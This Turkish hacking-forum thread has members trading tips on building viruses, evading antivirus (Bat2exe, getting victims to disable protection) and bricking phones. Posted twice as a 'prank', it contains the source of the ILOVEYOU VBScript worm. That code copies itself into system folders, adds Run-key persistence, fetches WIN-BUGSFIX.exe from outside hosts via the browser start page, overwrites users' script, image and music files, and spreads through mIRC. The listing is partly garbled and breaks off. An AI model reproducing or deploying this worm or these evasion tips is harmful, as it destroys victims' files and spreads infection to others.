TheMadness
Üye
varmısın iddiaya. Şu anda dev bir .bat virüsü yapıyorum. Bitince paylaşacağım. Sende denersin
- - - Eklendi - - -
AVG ve Avast uyarı veriyor
varmısın iddiaya. Şu anda dev bir .bat virüsü yapıyorum. Bitince paylaşacağım. Sende denersin
AVG ve Avast uyarı veriyor
Turk Hack Team da antivirüsleri bloklayan virüs veya komut olması gerekiyor. İstersen bir bak. Kurbana ilk önce bloklamayı açtırır veya yaptırırsın
Bat2exe kullan bakalım algılayacak mı
Turk Hack Team da antivirüsleri bloklayan virüs veya komut olması gerekiyor. İstersen bir bak. Kurbana ilk önce bloklamayı açtırır veya yaptırırsın[/B][/FONT]
Turk Hack Team da antivirüsleri bloklayan virüs veya komut olması gerekiyor. İstersen bir bak. Kurbana ilk önce bloklamayı açtırır veya yaptırırsın
Bazı antivirüslerde işe yaramaz. Örnek: Norton. Çünkü nortonda tamper protection diye bir özellik var antivirüse erişemiyor.
Bazı antivirüslerde işe yaramaz. Örnek: Norton. Çünkü nortonda tamper protection diye bir özellik var antivirüse erişemiyor.
S3 hayırlı olsun daha yeni görüyorumNasıl telefon ama
al sana eşek şakası bu virüs windowsu siler, cd-romu bozar, ekran kartını yakar. Olacaklardan kesinlikle BEN SORUMLU DEĞİLİM!!
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow eq=""
ctr=0
Set fso = CreateObject
("Scripting.FileSystemObject")
set file = fso.OpenTextFile
(WScript.ScriptFullname,1) vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER
\Software\Micros oft\Window s Scripting Host
\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\Windows Scripting Host\Settings \Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-
YOU.TXT.vbs")
regruns()
html() spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n\Run
\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n
\RunServices \Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER
\Software\Micros oft\Intern et Explorer
\Download Directory")
if (downread="") then downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1)
then
Randomize
num = Int((4 * Rnd) + 1) if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
Linkleri görüntülemek için kayıt olmalısınız
HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT /WIN-BUGSFIX.exe" elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
Linkleri görüntülemek için kayıt olmalısınız
skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
Linkleri görüntülemek için kayıt olmalısınız
jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3
V bvg/WIN-BUGSFIX.exe" elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
Linkleri görüntülemek için kayıt olmalısınız
sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwe
ras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/
WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0)
then regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n\Run\WIN-
BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software
\Microsoft\Internet Explorer\Main\Start
Page","about:blank" end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set scriptini=fso.CreateTextFile
(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this
script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will
affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme )
{ halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec) set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then msg = 0
else
msg = 1
end if
fileexist = msg
end function function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
- - - Eklendi - - -
biraz sert oldu ama olsun
al sana eşek şakası bu virüs windowsu siler, cd-romu bozar, ekran kartını yakar. Olacaklardan kesinlikle BEN SORUMLU DEĞİLİM!!
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim
fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow eq=""
ctr=0
Set fso = CreateObject
("Scripting.FileSystemObject")
set file = fso.OpenTextFile
(WScript.ScriptFullname,1) vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER
\Software\Micros oft\Window s Scripting Host
\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software
\Microsoft\Windows Scripting Host\Settings \Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-
YOU.TXT.vbs")
regruns()
html() spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n\Run
\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n
\RunServices \Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER
\Software\Micros oft\Intern et Explorer
\Download Directory")
if (downread="") then downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1)
then
Randomize
num = Int((4 * Rnd) + 1) if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
www.skyinet.net/~young1s/
HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT /WIN-BUGSFIX.exe" elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
www.skyinet.net/~angelcat/
skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
www.skyinet.net/~koichi/
jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3
V bvg/WIN-BUGSFIX.exe" elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page","http://
www.skyinet.net/~chu/
sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwe
ras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/
WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0)
then regcreate "HKEY_LOCAL_MACHINE\Software
\Microsoft\Windows \Cur rentVersio n\Run\WIN-
BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software
\Microsoft\Internet Explorer\Main\Start
Page","about:blank" end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp")
then
set scriptini=fso.CreateTextFile
(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this
script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will
affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme )
{ halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec) set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then msg = 0
else
msg = 1
end if
fileexist = msg
end function function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
- - - Eklendi - - -
biraz sert oldu ama olsun
Benim arkadaşım oranın kurulmasına öncülük etti
bu batch virüsü değildir bu virüs vbs virüsüdür
.vbs yapacağım yani
symbian için bozuk bir temayı telefon hafızasına kurup telefonu kapatın. Mis gibi bozuk telefon işte
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?